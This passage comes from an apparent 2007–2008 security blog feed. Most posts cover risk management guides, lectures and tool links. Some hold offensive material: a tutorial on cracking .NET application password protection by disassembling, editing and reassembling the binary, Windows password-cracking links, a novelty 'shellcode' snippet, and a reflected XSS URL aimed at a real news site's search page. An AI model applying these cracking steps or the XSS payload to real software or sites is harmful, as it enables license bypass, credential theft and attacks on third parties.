/&gt;"Microsoft’s approach to risk management and assessment isn’t the only one available to organizations. Some other popular approaches include:&lt;br /&gt;&lt;br /&gt;    * Risk Management Guide for Information Technology Systems and Security Self-Assessment Guide for Information Technology Systems, both developed by the National Institute for Standards and Technology (NIST)&lt;br /&gt;&lt;br /&gt;&lt;a href="http://csrc.nist.gov/publications/nistpubs/800-30/sp800-30.pdf"&gt;http://csrc.nist.gov/publications/nistpubs/800-30/sp800-30.pdf&lt;/a&gt;&lt;br /&gt;&lt;a href="http://csrc.nist.gov/publications/nistpubs/800-26/sp800-26.pdf"&gt;http://csrc.nist.gov/publications/nistpubs/800-26/sp800-26.pdf&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;    * Information technology — Code of practice for information security management (ISO 17799), available from the International Standards Organization (ISO).&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.iso.org/iso/en/CatalogueDetailPage.CatalogueDetail?CSNUMBER=33441&amp;ICS1=35&amp;ICS2=40&amp;ICS3="&gt;http://www.iso.org/iso/en/CatalogueDetailPage.CatalogueDetail?CSNUMBER=33441&amp;ICS1=35&amp;ICS2=40&amp;ICS3=&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;    * Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE) from Computer Emergency Response Team (CERT) at the Software Engineering Institute at Carnegie-Mellon University.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.cert.org/octave"&gt;http://www.cert.org/octave&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;These resources are also useful in helping you plan and implement an effective risk management solution for your company. But in my opinion, Microsoft’s approach is simple and easy to implement, and is a good starting point, especially for IT shops that are strong on Microsoft platforms. For although the Guide is described by Microsoft as being cross-platform and vendor-neutral in its approach, its prescriptive control solutions target Microsoft products in particular. That doesn’t surprise me however, and in no way reduces the usefulness of this excellent Guide."&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.windowsecurity.com/articles/Microsoft-Security-Risk-Management-Guide.html"&gt;Read source...&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;www.davidi.org&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8224460545948081766-8454070562328624498?l=davidiorg.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.windowsecurity.com/articles/Microsoft-Security-Risk-Management-Guide.html' title='More info on  Security Risk Management'/><link rel='replies' type='application/atom+xml' href='http://davidiorg.blogspot.com/feeds/8454070562328624498/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8224460545948081766&amp;postID=8454070562328624498' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/8454070562328624498'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/8454070562328624498'/><link rel='alternate' type='text/html' href='http://davidiorg.blogspot.com/2008/02/more-info-on-security-risk-management.html' title='More info on  Security Risk Management'/><author><name>Amir Davidi</name><uri>http://www.blogger.com/profile/02404144649222267559</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8224460545948081766.post-8164961166081981269</id><published>2007-12-22T12:47:00.001+02:00</published><updated>2008-06-30T16:41:39.024+03:00</updated><title type='text'>What is my Windows password ?</title><content type='html'>&lt;a href="http://articles.techrepublic.com.com/i/tr/cms/contentPics/EDR_options.gif"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 200px;" src="http://articles.techrepublic.com.com/i/tr/cms/contentPics/EDR_options.gif" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;There are some live CDs that are used to recover the Windows Password (in case you forgot what it is) as well as other things.&lt;br /&gt;&lt;br /&gt;One of them is &lt;a href="http://ophcrack.sourceforge.net/"&gt;ophcrack &lt;/a&gt;&lt;br /&gt;(Remember ERD commander 2005?)&lt;br /&gt;&lt;br /&gt;See how it is simple to use Ophcrack in &lt;a href="http://www.metacafe.co.il/watch/871129/hacking_windows_passwords/"&gt;here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;More info:&lt;br /&gt;http://home.eunet.no/~pnordahl/ntpasswd/&lt;br /&gt;http://www.jms1.net/ie.shtml&lt;br /&gt;http://geeksaresexy.blogspot.com/2005/12/auditing-your-users-passwords-for.html&lt;br /&gt;http://www.ultimatebootcd.com/&lt;br /&gt;http://sourceforge.net/projects/austrumi/&lt;br /&gt;http://geeksaresexy.blogspot.com/2006/04/cracking-your-windows-sam-database-in.html&lt;div class="blogger-post-footer"&gt;www.davidi.org&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8224460545948081766-8164961166081981269?l=davidiorg.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://davidiorg.blogspot.com/feeds/8164961166081981269/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8224460545948081766&amp;postID=8164961166081981269' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/8164961166081981269'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/8164961166081981269'/><link rel='alternate' type='text/html' href='http://davidiorg.blogspot.com/2007/12/what-is-my-windows-password.html' title='What is my Windows password ?'/><author><name>Amir Davidi</name><uri>http://www.blogger.com/profile/02404144649222267559</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8224460545948081766.post-8209826117863148791</id><published>2007-11-08T14:06:00.001+02:00</published><updated>2008-02-14T13:26:12.481+02:00</updated><title type='text'>Risk Assessment, continue</title><content type='html'>The sum was sent &lt;br /&gt;&lt;br /&gt;More info on "Assessing Risk" can be found &lt;a href="http://www.microsoft.com/technet/security/guidance/complianceandpolicies/secrisk/srsgch04.mspx"&gt;here&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;www.davidi.org&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8224460545948081766-8209826117863148791?l=davidiorg.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://davidiorg.blogspot.com/feeds/8209826117863148791/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8224460545948081766&amp;postID=8209826117863148791' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/8209826117863148791'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/8209826117863148791'/><link rel='alternate' type='text/html' href='http://davidiorg.blogspot.com/2007/11/risk-assessment-continue.html' title='Risk Assessment, continue'/><author><name>Amir Davidi</name><uri>http://www.blogger.com/profile/02404144649222267559</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8224460545948081766.post-5377245295623311185</id><published>2007-09-19T08:22:00.001+02:00</published><updated>2008-02-14T11:15:56.311+02:00</updated><title type='text'>Risk Assessment part 1</title><content type='html'>As promised I will publish in the next days the sum of the lecture that I presented on 18/09/2007 at the technion class.&lt;br /&gt;&lt;br /&gt;it  will include all the links, tools and highlights.&lt;br /&gt;You will be more than welcomed to comment if some thing is missing.&lt;br /&gt;&lt;br /&gt;In general , more info can be found on&lt;br /&gt;&lt;br /&gt;1.http://www.microsoft.com/technet/security/topics/complianceandpolicies/secrisk/srsgch04.mspx (Security Risk Management Guide )&lt;br /&gt;&lt;br /&gt;2. &lt;a href="http://blogs.technet.com/mjmurphy/"&gt;Michael J. Murphy's Web Log&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Find  security training events:&lt;br /&gt; http://www.microsoft.com/seminar/events/security.mspx &lt;br /&gt;Sign up for security communications:&lt;br /&gt; http://www.microsoft.com/technet/security/signup/ default.mspx &lt;br /&gt;Order the Security Guidance Kit: &lt;br /&gt; http://www.microsoft.com/security/guidance/order/ default.mspx &lt;br /&gt;Get additional security tools and content:&lt;br /&gt; http://www.microsoft.com/security/guidance&lt;br /&gt;&lt;br /&gt;Download MSAT ver 3.0 on:&lt;br /&gt;&lt;a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=6D79DF9C-C6D1-4E8F-8000-0BE72B430212&amp;displaylang=en"&gt;http://www.microsoft.com/downloads/details.aspx?FamilyId=6D79DF9C-C6D1-4E8F-8000-0BE72B430212&amp;displaylang=en&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;www.davidi.org&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8224460545948081766-5377245295623311185?l=davidiorg.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://davidiorg.blogspot.com/feeds/5377245295623311185/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8224460545948081766&amp;postID=5377245295623311185' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/5377245295623311185'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/5377245295623311185'/><link rel='alternate' type='text/html' href='http://davidiorg.blogspot.com/2007/09/risk-assessment-part-1-summery.html' title='Risk Assessment part 1'/><author><name>Amir Davidi</name><uri>http://www.blogger.com/profile/02404144649222267559</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8224460545948081766.post-7229805447842230822</id><published>2007-09-14T11:50:00.000+02:00</published><updated>2007-09-14T11:59:50.496+02:00</updated><title type='text'>recommnded site of the week</title><content type='html'>This site was recomended by my friend ^E^.&lt;br /&gt;&lt;br /&gt;You can find there  some great simple tools for spoofind, port scanning, web security, wireless, honypots ,audits and more&lt;br /&gt;&lt;br /&gt;spoofing &lt;br /&gt;http://www.hackerscenter.com/directory.asp?id=18&lt;br /&gt;&lt;br /&gt;port scanning&lt;br /&gt;http://www.hackerscenter.com/directory.asp?id=17&lt;br /&gt;&lt;br /&gt;web security&lt;br /&gt;http://www.hackerscenter.com/directory.asp?id=16&lt;br /&gt;&lt;br /&gt;they have also released their ethical hackers tool kit&lt;br /&gt;&lt;br /&gt;enjoy&lt;div class="blogger-post-footer"&gt;www.davidi.org&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8224460545948081766-7229805447842230822?l=davidiorg.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://davidiorg.blogspot.com/feeds/7229805447842230822/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8224460545948081766&amp;postID=7229805447842230822' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/7229805447842230822'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/7229805447842230822'/><link rel='alternate' type='text/html' href='http://davidiorg.blogspot.com/2007/09/recommnded-site-of-week.html' title='recommnded site of the week'/><author><name>Amir Davidi</name><uri>http://www.blogger.com/profile/02404144649222267559</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8224460545948081766.post-1556621592366676351</id><published>2007-09-04T13:35:00.000+03:00</published><updated>2007-09-04T20:36:47.163+03:00</updated><title type='text'>Just some good basic downloads</title><content type='html'>Hi,&lt;br /&gt;&lt;br /&gt;Recently I was asked to recommend some basic useful links&lt;br /&gt;I will present them shortly and give more details in the future&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Metasploit&lt;/strong&gt;&lt;br /&gt;&lt;a href="http://framework.metasploit.com/msf/downloader/?id=framework-3.0.exe"&gt;http://framework.metasploit.com/msf/downloader/?id=framework-3.0.exe&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Tor&lt;/strong&gt;&lt;br /&gt;&lt;a href="http://tor.eff.org/dist/vidalia-bundles/vidalia-bundle-0.1.2.17-0.0.14.exe"&gt;http://tor.eff.org/dist/vidalia-bundles/vidalia-bundle-0.1.2.17-0.0.14.exe&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Cain&lt;/strong&gt;&lt;br /&gt;&lt;a href="http://www.oxid.it/cain.html"&gt;http://www.oxid.it/cain.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Nmap&lt;/strong&gt;&lt;br /&gt;&lt;a href="http://download.insecure.org/nmap/dist/nmap-4.22SOC6-setup.exe"&gt;http://download.insecure.org/nmap/dist/nmap-4.22SOC6-setup.exe&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Ethereal&lt;/strong&gt;&lt;br /&gt;&lt;a href="http://www.ethereal.com/distribution/win32/ethereal-setup-0.99.0.exe"&gt;http://www.ethereal.com/distribution/win32/ethereal-setup-0.99.0.exe&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;www.davidi.org&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8224460545948081766-1556621592366676351?l=davidiorg.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://davidiorg.blogspot.com/feeds/1556621592366676351/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8224460545948081766&amp;postID=1556621592366676351' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/1556621592366676351'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/1556621592366676351'/><link rel='alternate' type='text/html' href='http://davidiorg.blogspot.com/2007/09/just-some-good-basic-links.html' title='Just some good basic downloads'/><author><name>Amir Davidi</name><uri>http://www.blogger.com/profile/02404144649222267559</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8224460545948081766.post-1245149460123189072</id><published>2007-08-29T13:35:00.000+03:00</published><updated>2007-08-29T13:40:24.047+03:00</updated><title type='text'>Risk assessment &amp; managment</title><content type='html'>I am going to lecture at the &lt;a href="http://cont-edu.technion.ac.il/category/Computer_Knowledge_Security"&gt;technion &lt;/a&gt; on “Risk assessment &amp; management” on&lt;br /&gt;- 18/09/2007&lt;br /&gt;- 23/09/2007&lt;br /&gt;The summery of the lectures will be publish on 24/09/07&lt;br /&gt;&lt;br /&gt;More lecture's subjects and dates will be publish soon.&lt;div class="blogger-post-footer"&gt;www.davidi.org&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8224460545948081766-1245149460123189072?l=davidiorg.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://davidiorg.blogspot.com/feeds/1245149460123189072/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8224460545948081766&amp;postID=1245149460123189072' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/1245149460123189072'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/1245149460123189072'/><link rel='alternate' type='text/html' href='http://davidiorg.blogspot.com/2007/08/risk-assessment-managment.html' title='Risk assessment &amp; managment'/><author><name>Amir Davidi</name><uri>http://www.blogger.com/profile/02404144649222267559</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8224460545948081766.post-4435271676214012906</id><published>2007-08-21T14:55:00.000+03:00</published><updated>2007-08-21T15:16:55.648+03:00</updated><title type='text'>wild but not from the wild - viagra shell code</title><content type='html'>viagra shell code - By &lt;strong&gt;Jacky Altal&lt;/strong&gt; ... and Davidi&lt;br /&gt;----------------------------------&lt;br /&gt;"Shellcode may be used as an exploit payload, providing a cracker with, typically, command line access to a computer system with the privileges of the process that has been exploited"  - quoted from wikipedia.&lt;br /&gt;&lt;br /&gt;We founded our self using fixed Payloads written by &lt;a href="http://www.metasploit.com/"&gt;metasploit&lt;/a&gt; group (&lt;a href="http://en.wikipedia.org/wiki/H._D._Moore"&gt;HD More&lt;/a&gt;, Skype). Usaully, the Download &amp;&amp; Execute, Windows Execute Command, Windows Bind Shell and obviously  the Reverse Shell are the easiest to understand especially when you are new to the shell code area. In order to add some fun , here is an  hearable shell code to add  to the personal arsenal kit.&lt;br /&gt;&lt;br /&gt;This is quite big shell code and it cant be used on small buffers but still...&lt;br /&gt;Cant stop smiling while running my shell code again and again.&lt;br /&gt;&lt;br /&gt;This is only a taste of the shell code source. you can find it all in the following link: &lt;a href="http://www.hackingdefined.com/viagrashellcode.rar"&gt;HackingDefined&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Credits &lt;a href="http://www.blogger.com/profile/10783056673584844580"&gt;Jacky Altal &lt;/a&gt;&lt;br /&gt; &lt;br /&gt;void main(void)&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt; __asm (&lt;br /&gt;  &lt;br /&gt;  mov eax,345 //1b8h&lt;br /&gt;  mov ebx,392 //1f4h&lt;br /&gt;  push eax&lt;br /&gt;  push ebx&lt;br /&gt;  mov edx,0x7c837a77&lt;br /&gt;  call edx&lt;br /&gt;&lt;br /&gt;  mov eax,500&lt;br /&gt;  mov ebx,326&lt;br /&gt;  push eax&lt;br /&gt;  push ebx&lt;br /&gt;  mov edx,0x7c837a77&lt;br /&gt;  call edx&lt;br /&gt;  &lt;br /&gt;  );&lt;br /&gt;}&lt;br /&gt;  &lt;br /&gt;Enjoy,&lt;div class="blogger-post-footer"&gt;www.davidi.org&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8224460545948081766-4435271676214012906?l=davidiorg.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://davidiorg.blogspot.com/feeds/4435271676214012906/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8224460545948081766&amp;postID=4435271676214012906' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/4435271676214012906'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/4435271676214012906'/><link rel='alternate' type='text/html' href='http://davidiorg.blogspot.com/2007/08/wild-but-not-from-thewild-viagra-shell.html' title='wild but not from the wild - viagra shell code'/><author><name>Amir Davidi</name><uri>http://www.blogger.com/profile/02404144649222267559</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8224460545948081766.post-4702114702412013729</id><published>2007-08-19T17:51:00.001+03:00</published><updated>2007-08-21T14:06:10.809+03:00</updated><title type='text'>.Net Password Cracking by Jacky Altal  and Amir Davidi</title><content type='html'>&lt;a href="http://3.bp.blogspot.com/_8AJZEqJ-sEw/Rshd9epjUKI/AAAAAAAAAaA/FQvLB0eVpwA/s1600-h/3.gif"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://3.bp.blogspot.com/_8AJZEqJ-sEw/Rshd9epjUKI/AAAAAAAAAaA/FQvLB0eVpwA/s320/3.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5100429888777834658" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_8AJZEqJ-sEw/Rshdj-pjUJI/AAAAAAAAAZ4/QyC7zAkJyg0/s1600-h/1.gif"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/_8AJZEqJ-sEw/Rshdj-pjUJI/AAAAAAAAAZ4/QyC7zAkJyg0/s320/1.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5100429450691170450" /&gt;&lt;/a&gt;&lt;br /&gt;.Net Password Cracking by &lt;a href="http://www.blogger.com/profile/10783056673584844580"&gt;Jacky Altal  &lt;/a&gt;and Amir Davidi&lt;br /&gt;                                                                      &lt;br /&gt;                                                                       &lt;br /&gt;&lt;strong&gt;Overview:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Papers saying that 95% of the .NET applications are vulnerable to a simple cracking method, in my experience most of the .NET are too easy to crack and most of them are considered to be level one cracking. I don’t think that a high programming level should be required to accomplish this task. Actually it is much easy to crack .NET files then any other type of EXE. You are going to need a Brain……&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;What are .NET assemblies?&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;- .NET assemblies (Apps, Dlls) are running on .NET Framework&lt;br /&gt;- .Net solutions/projects compiled into MSIL (Microsoft Intermediate Language) and then assembled to .NET assemble&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Tools:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;.NET framework comes with two important tools: &lt;br /&gt;ILDASM - .NET de-assemble &lt;br /&gt;ILASM - .NET assemble &lt;br /&gt;&lt;br /&gt; &lt;strong&gt;Logical Steps:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;- .NET de-assembling&lt;br /&gt;- MSIL code editing&lt;br /&gt;- .NET re-assembling&lt;br /&gt;&lt;br /&gt;Let's start cracking…………….InternetTV&lt;br /&gt;&lt;br /&gt;1. Install the application.&lt;br /&gt;2. Insert any password that you want and take a note of the error message.&lt;br /&gt;3. Locate the exe file.&lt;br /&gt;4. Open ILDASM.&lt;br /&gt;5. Change (C)onditional jumps to the opposite value (82 to 83)&lt;br /&gt;6. Re-assemble file&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;strong&gt;ILDASM&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;ILDASM is a Microsoft tool that used to examine .NET assembly files. With ILDASM we can generate ILCODE from a given assembly file. &lt;br /&gt;&lt;br /&gt;Let's open the InternetTV executable file:&lt;br /&gt;&lt;br /&gt;C:\Program Files\Microsoft Visual Studio 8\SDK\v2.0\Bin&gt;ildasm "C:\Documents and Settings\jacky\MyDocuments\VisualStudio2005\Projects\ InternetTV \bin\Debug\AyalonHighWayViewer.exe" /out="c:\InternetTV.il" /text&lt;br /&gt;&lt;br /&gt;Now we have a disassembly file that we can work on. And named InternetTV.il&lt;br /&gt;&lt;br /&gt;Open the new file (InternetTv.il) with your favorite editor and start editing it. Actually our goal is to remove the Secure Name Protection from the code and then search for username and password values. This step is very trivial and easy (if you want to understand more about the method just google it). As for now we will just remove it from our code and move on to the credentials values.&lt;br /&gt;&lt;br /&gt;Search for "publickey" and remove it (if exists) then search for Password and User fields Get your values and you are set……&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Re-Assembly&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;We will use the ILASM file to re assembly our file (comes with VS.NET)&lt;br /&gt;&lt;br /&gt;C:\Program Files\Microsoft Visual Studio 8\SDK\v2.0\Bin&gt;ilasm C:\ILCODE\ InternetTV.il /resource=C:\ILCODE\ InternetTV.res /output=C:\InternetTV.exe&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Last step:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Copy the new InternetTV.EXE file to your installed directory and run it……….&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;In the next tutorial we will learn how to inject functions into another .NET application…..&lt;br /&gt;&lt;br /&gt;Enjoy.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;a href="http://www.hackingdefined.com/cracking-net.rar"&gt;Download&lt;/a&gt;&lt;/strong&gt;&lt;br /&gt;http://www.hackingdefined.com/cracking-net.rar&lt;br /&gt;&lt;strong&gt;Info&lt;/strong&gt;:&lt;br /&gt;http://visualbasic.about.com/gi/dynamic/offsite.htm?site=http://sourceforge.net/projects/sharpdevelop&lt;div class="blogger-post-footer"&gt;www.davidi.org&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8224460545948081766-4702114702412013729?l=davidiorg.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://davidiorg.blogspot.com/feeds/4702114702412013729/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8224460545948081766&amp;postID=4702114702412013729' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/4702114702412013729'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/4702114702412013729'/><link rel='alternate' type='text/html' href='http://davidiorg.blogspot.com/2007/08/net-password-cracking-by-jacky-altal_19.html' title='.Net Password Cracking by Jacky Altal  and Amir Davidi'/><author><name>Amir Davidi</name><uri>http://www.blogger.com/profile/02404144649222267559</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_8AJZEqJ-sEw/Rshd9epjUKI/AAAAAAAAAaA/FQvLB0eVpwA/s72-c/3.gif' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8224460545948081766.post-865352361800306275</id><published>2007-08-15T21:19:00.000+03:00</published><updated>2007-08-15T21:27:06.671+03:00</updated><title type='text'>KISS principle</title><content type='html'>Some one that I truly respect asked me today to explain how I performed something related to security issue. This person is a great source of knowledge for all that concern "Application security", and one hell of a smart guy.&lt;br /&gt;&lt;br /&gt;While trying to figured out how to explain it, and yet not expose my deepest technical secrets, I remembered one great subject that once I was honored to learn about.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;It called "KISS".&lt;br /&gt;&lt;br /&gt;"The term KISS is an acronym of the phrase 'Keep It Simple, Stupid', and the KISS principle states that design simplicity should be a key goal and unnecessary complexity avoided. It serves as a useful and frequent verbal exhortation (or even dedicated policy) in software development, animation, engineering, and in strategic planning (especially military operations). Other versions of the phrase include "Keep It Simple &amp; Stupid" (most recently used in west-European literature), "Keep It Sweet &amp; Simple," "Keep It Short &amp; Simple," "Keep it Simple, Sweetheart," and "Keep it Simple, Sherlock," and the obvious scatalogical variation.&lt;br /&gt;&lt;br /&gt;The principle roughly corresponds to Occam's razor, and to Albert Einstein's maxim that "everything should be made as simple as possible, but no simpler."[1]&lt;br /&gt;&lt;br /&gt;Leonardo da Vinci, who lived after Ockham’s time, had his own variant of Occam’s Razor, sidestepping the need for sophistication by equating it to simplicity: "Simplicity is the ultimate sophistication"&lt;br /&gt;--------------------------------------------------&lt;br /&gt;&lt;br /&gt;Taken from http://en.wikipedia.org/wiki/KISS_principle&lt;div class="blogger-post-footer"&gt;www.davidi.org&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8224460545948081766-865352361800306275?l=davidiorg.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://en.wikipedia.org/wiki/KISS_principle' title='KISS principle'/><link rel='replies' type='application/atom+xml' href='http://davidiorg.blogspot.com/feeds/865352361800306275/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8224460545948081766&amp;postID=865352361800306275' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/865352361800306275'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/865352361800306275'/><link rel='alternate' type='text/html' href='http://davidiorg.blogspot.com/2007/08/kiss-principle.html' title='KISS principle'/><author><name>Amir Davidi</name><uri>http://www.blogger.com/profile/02404144649222267559</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8224460545948081766.post-3771161535540602019</id><published>2007-08-14T17:22:00.000+03:00</published><updated>2007-08-14T17:36:27.920+03:00</updated><title type='text'>XSS fun</title><content type='html'>Credit to http://sla.ckers.org/forum/read.php?3,44,page=51&lt;br /&gt;Thanks also to Golan Yosef (finjan,mcrc)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.nypost.com/search/search.htm?q=%3Cscript%3Ealert('Ninet%20Sholetet!');%3C/script%3E&amp;s=news&amp;t=0"&gt;Sample 1&lt;/a&gt;&lt;br /&gt;&lt;a 